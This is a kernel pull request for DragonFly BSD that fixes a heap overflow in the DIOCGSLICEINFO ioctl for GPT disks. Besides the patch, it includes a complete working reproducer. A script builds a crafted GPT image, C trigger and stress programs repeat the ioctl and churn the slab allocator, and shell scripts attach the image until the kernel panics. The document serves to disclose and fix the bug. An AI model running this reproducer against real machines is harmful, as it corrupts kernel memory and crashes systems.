### PR TITLE
diskslice: heap overflow in DIOCGSLICEINFO for GPT disks

### DIFF
--- a/sys/kern/subr_diskslice.c
+++ b/sys/kern/subr_diskslice.c
@@ -554,8 +554,18 @@ dsioctl(cdev_t dev, u_long cmd, caddr_t data, int flags,
 		return (0);
 
 	case DIOCGSLICEINFO:
-		bcopy(ssp, data, (char *)&ssp->dss_slices[ssp->dss_nslices] -
-				 (char *)ssp);
+		/*
+		 * The ioctl data buffer is sized sizeof(struct diskslices)
+		 * (i.e. MAX_SLICES slots) via _IOR in diskslice.h.  GPT disks
+		 * allocate up to BASE_SLICE + MAX_GPT_ENTRIES (130) slots, so
+		 * cap the copy at MAX_SLICES to avoid overrunning the buffer.
+		 */
+		{
+			u_int ncap = (ssp->dss_nslices > MAX_SLICES) ?
+			    MAX_SLICES : ssp->dss_nslices;
+			bcopy(ssp, data, (char *)&ssp->dss_slices[ncap] -
+				    (char *)ssp);
+		}
 		return (0);
 
 	case DIOCSDINFO32:


### PR DESCRIPTION
# diskslice: heap overflow in DIOCGSLICEINFO for GPT disks

DIOCGSLICEINFO in `dsioctl()` copies `dss_nslices` slots worth of `struct diskslices` out to the caller via `bcopy(ssp, data, (char *)&ssp->dss_slices[ssp->dss_nslices] - (char *)ssp)` in `sys/kern/subr_diskslice.c`. The ioctl data buffer is `sizeof(struct diskslices)`, i.e. `MAX_SLICES` (16) slots, as sized by the `_IOR` in `sys/sys/diskslice.h`. A GPT disk allocates up to `BASE_SLICE + MAX_GPT_ENTRIES` (2 + 128 = 130) slots, so `dss_nslices` reaches 130 and the `bcopy` writes about 28 KB past the end of the destination on every call. Pointing the ioctl at a vnode-backed disk holding a crafted GPT with 128 partition entries deterministically corrupts the slab allocator and panics the kernel.

## Fix

Cap the copy at `MAX_SLICES` slots. The destination is the fixed-size `struct diskslices` the caller passes in, which only has room for `MAX_SLICES` entries, so copying more was never useful; GPT partitions beyond `MAX_SLICES` are already unreachable through this legacy ioctl. `ncap = min(dss_nslices, MAX_SLICES)` and `bcopy` only `&ssp->dss_slices[ncap] - ssp` bytes.

## Before / after

`#0 unpatched` (DragonFly 6.5-DEVELOPMENT), ioctl against a crafted 128-entry GPT image, then slab churn:

```
DIOCGSLICEINFO returned nslices=130
...
Fatal trap 12: page fault while in kernel mode
fault virtual address     = 0x0
Stopped at      slab_cleanup+0x1c9:     cmpq    %rbx,(%rcx)
```

Reproduced across three fresh-boot runs (panic varies between `slab_cleanup`, `slaballoc: corrupted zone`, and a hammer2 cascade as heap layout shifts).

`#1 patched` (same kernel + this fix), identical image, 10x ioctl + 3x 32-proc flood + 20x ioctl:

```
=== parallel flood 32x (3 rounds) ===
round 1 done
round 2 done
round 3 done
=== if we got here, NO panic on patched kernel ===
```

Guest stays up; no slab corruption across all runs.

## Reproducer

The overflow itself is synchronous (the `bcopy` runs every call); the panic it causes is asynchronous and surfaces under slab pressure, so the run mixes repeated ioctls with fd/fork churn.

`build_gpt.py` (host-side; produces a minimal valid GPT with 128 entries so the kernel sets `dss_nslices = 130`):

```python
#!/usr/bin/env python3
"""Build a GPT disk image that overflows DIOCGSLICEINFO.

Creates a minimal valid GPT with hdr_entries=128. When DragonFlyBSD probes
this disk, subr_diskgpt.c sets dss_nslices = BASE_SLICE + 128 = 130.
Issuing DIOCGSLICEINFO then bcopy's 130 slices worth of data into a buffer
sized for only 16 slices -> kernel heap overflow (subr_diskslice.c).
"""
import struct, sys, binascii

SECTOR = 512

def le32(x): return struct.pack('<I', x)
def le64(x): return struct.pack('<Q', x)

def crc32(data):
    return binascii.crc32(data) & 0xffffffff

def gpt_entry(type_guid=b'\x00'*16, guid=b'\x00'*16, lba_start=0, lba_end=0,
              attrs=0, name=''):
    name_utf16 = name.encode('utf-16-le')[:71].ljust(72, b'\x00')
    return (type_guid.ljust(16,b'\x00')[:16] +
            guid.ljust(16,b'\x00')[:16] +
            le64(lba_start) + le64(lba_end) + le64(attrs) + name_utf16)

ENTRIES = 128   # must give dss_nslices > MAX_SLICES(16)
ENT_SZ  = 128

def main():
    out = sys.argv[1] if len(sys.argv) > 1 else 'overflow.img'
    total_sectors = 2048
    mbr = bytearray(SECTOR)
    mbr[446] = 0x00
    mbr[450] = 0xEE                       # GPT protective type
    mbr[454:458] = le32(1)
    mbr[458:462] = le32(total_sectors - 1)
    mbr[510:512] = b'\55\xaa'

    entry_array_lba = 2
    entry_array_bytes = ENTRIES * ENT_SZ
    entry_array_sectors = (entry_array_bytes + SECTOR - 1) // SECTOR
    first_usable = 2 + entry_array_sectors
    last_usable = total_sectors - entry_array_sectors - 2

    hdr = bytearray(92)
    hdr[0:8]   = b'EFI PART'
    hdr[8:12]  = le32(0x00010000)
    hdr[12:16] = le32(92)
    hdr[24:32] = le64(1)
    hdr[32:40] = le64(total_sectors - 1)
    hdr[40:48] = le64(first_usable)
    hdr[48:56] = le64(last_usable)
    hdr[72:80] = le64(entry_array_lba)
    hdr[80:84] = le32(ENTRIES)
    hdr[84:88] = le32(ENT_SZ)

    type_guid = b'\xa2\xa0\xd0\xeb\xe5\xb9\x33\x44\x87\xc0\x68\xb6\xb7\x1e\x05\x2d'
    entries = bytearray()
    for i in range(ENTRIES):
        if i < 17:
            entries += gpt_entry(type_guid=type_guid, guid=b'\x01'*16,
                                 lba_start=first_usable + i*10,
                                 lba_end=first_usable + i*10 + 9,
                                 name='part%d' % i)
        else:
            entries += gpt_entry()  # nil entries still counted in dss_nslices

    hdr[88:92] = le32(0)
    hdr[88:92] = le32(crc32(bytes(entries)))
    # CRC of header (compute over header with hdr_crc_self zeroed)
    hdr[16:20] = le32(0)
    hdr[16:20] = le32(crc32(bytes(hdr)))

    img = bytearray(SECTOR * total_sectors)
    img[0:SECTOR] = mbr
    img[SECTOR:SECTOR+92] = hdr
    img[2*SECTOR:2*SECTOR+len(entries)] = entries
    with open(out, 'wb') as f:
        f.write(img)
    print('Wrote %s: %d bytes, %d GPT entries.' % (out, len(img), ENTRIES))

if __name__ == '__main__':
    main()
```

`trigger.c` (guest-side; issues the ioctl and reports `nslices`):

```c
/* Issue DIOCGSLICEINFO on a slice device whose backing disk has a GPT
 * with > 15 entries, triggering the heap overflow in subr_diskslice.c.
 * Build:  cc -o trigger trigger.c
 * Usage:  ./trigger /dev/vnd0s1
 */
#include <sys/ioctl.h>
#include <sys/diskslice.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

int
main(int argc, char **argv)
{
	const char *dev = (argc > 1) ? argv[1] : "/dev/vnd0s1";
	struct diskslices ds;
	int fd;

	fd = open(dev, O_RDONLY);
	if (fd < 0) { perror("open"); return 1; }

	/* DIOCGSLICEINFO bcopy's dss_nslices-worth of struct diskslice into
	 * a sizeof(struct diskslices) (16-slice) buffer. For a GPT disk with
	 * > 15 entries this overflows the kernel heap by up to ~29 KB. */
	if (ioctl(fd, DIOCGSLICEINFO, &ds) < 0) {
		perror("ioctl DIOCGSLICEINFO");
		close(fd);
		return 1;
	}
	fprintf(stderr, "DIOCGSLICEINFO returned nslices=%u\n", ds.dss_nslices);
	close(fd);
	return 0;
}
```

`trigger_stress.c` (guest-side; repeats the ioctl and churns the slab allocator so the corruption surfaces as a panic):

```c
/* Stress trigger - issue DIOCGSLICEINFO (the 28KB heap overflow), then heavily
 * churn the slab allocator (open/close many fds, fork/exit) so a corrupted
 * neighbor object gets validated/freed and the overflow surfaces as a panic.
 * The overflow itself is guaranteed on every run; the panic is not.
 *
 * Build:  cc -O2 -o trigger_stress trigger_stress.c
 * Usage:  ./trigger_stress /dev/vn0s1 [iterations]
 */
#include <sys/ioctl.h>
#include <sys/diskslice.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>

int
main(int argc, char **argv)
{
    const char *dev = (argc > 1) ? argv[1] : "/dev/vn0s1";
    int iters = (argc > 2) ? atoi(argv[2]) : 5;
    int fd, n;

    for (n = 0; n < iters; n++) {
        fd = open(dev, O_RDONLY);
        if (fd < 0) { perror("open"); return 1; }
        struct diskslices ds;
        if (ioctl(fd, DIOCGSLICEINFO, &ds) < 0) {
            perror("ioctl DIOCGSLICEINFO");
            close(fd);
            return 1;
        }
        fprintf(stderr, "[%d] DIOCGSLICEINFO returned nslices=%u (overflow happened)\n",
                n, ds.dss_nslices);
        /* churn: open/close a pile of low-numbered fds to touch the slab zone
         * that may have been smashed by the 28KB overrun. */
        int ks[64];
        int j;
        for (j = 0; j < 64; j++) {
            ks[j] = open("/dev/null", O_RDONLY);
        }
        for (j = 0; j < 64; j++) {
            if (ks[j] >= 0) close(ks[j]);
        }
        close(fd);
    }
    /* fork/exit churn: fdfree on exit validates file-descriptor slab objects. */
    fprintf(stderr, "fork/exit churn to force fdfree slab validation...\n");
    for (n = 0; n < 40; n++) {
        pid_t p = fork();
        if (p == 0) {
            int k;
            for (k = 0; k < 32; k++) open("/dev/null", O_RDONLY);
            _exit(0);
        } else if (p > 0) {
            waitpid(p, NULL, 0);
        }
    }
    fprintf(stderr, "stress done; if we got here, no synchronous panic this run.\n");
    return 0;
}
```

`build.sh` (guest-side; python3 is not on the DragonFly guest by default, so generate `overflow.img` on a host and ship it alongside):

```sh
#!/bin/sh
# Builds the two trigger programs. The crafted GPT image (overflow.img) is
# produced by build_gpt.py, which requires python3 -- NOT installed on the
# DragonFly guest by default. Generate overflow.img on a host with python3:
#       python3 build_gpt.py overflow.img
# and ship it alongside this script.
set -e
cd "$(dirname "$0")"
cc -O2 -o trigger trigger.c
cc -O2 -o trigger_stress trigger_stress.c
echo "Built: trigger, trigger_stress"
if [ ! -f overflow.img ]; then
    echo "WARNING: overflow.img missing -- run: python3 build_gpt.py overflow.img"
fi
ls -l trigger trigger_stress overflow.img 2>/dev/null || true
```

`run.sh` (must run as root; devfs grants `/dev/vn0*` as `root:operator` on the default ruleset, an unprivileged user gets EACCES). The panic is asynchronous, so the script may return before the guest freezes; the proof is the boot log:

```sh
#!/bin/sh
# Triggers the DIOCGSLICEINFO heap overflow and induces the slab-corruption
# panic. MUST RUN AS ROOT. The panic is asynchronous (slab_cleanup trips after
# the trigger process exits), so this script may return before the guest
# freezes; the proof is in the boot log.
#
# Usage (as root on the guest):  ./run.sh [vn_device]
DEV=${1:-vn0}
cd "$(dirname "$0")"
echo "=== attaching crafted GPT image (128 entries) to $DEV ==="
vnconfig -c "$DEV" ./overflow.img
echo "attach rc=$?"
ls /dev/${DEV}* 2>&1 | head -20
echo
echo "=== single DIOCGSLICEINFO (proves overflow: nslices should be 130) ==="
./trigger /dev/${DEV}s1
echo "trigger rc=$?"
echo
echo "=== stress: 5 ioctl+fd-churn iters + fork/exit churn (induces panic) ==="
./trigger_stress /dev/${DEV}s1 5
echo "stress rc=$?"
echo
echo "=== parallel flood (16 procs) to churn slab zones hit by the overrun ==="
i=0
while [ $i -lt 16 ]; do
    ./trigger /dev/${DEV}s1 >/dev/null 2>&1 &
    i=$((i+1))
done
wait
echo "flood rc=$?"
echo
echo "=== if the guest is still up, the async slab_cleanup panic will follow; ==="
echo "=== check the boot log for: 'Fatal trap 12 ... slab_cleanup'           ==="
vnconfig -u "$DEV" 2>/dev/null || true
```

Build and run:

```
python3 build_gpt.py overflow.img        # on a host with python3
# ship overflow.img + trigger.c + trigger_stress.c + build.sh + run.sh to the guest, then as root:
sh ./build.sh
sh ./run.sh vn0          # prints nslices=130 (overrun fires), then panics under slab churn
```
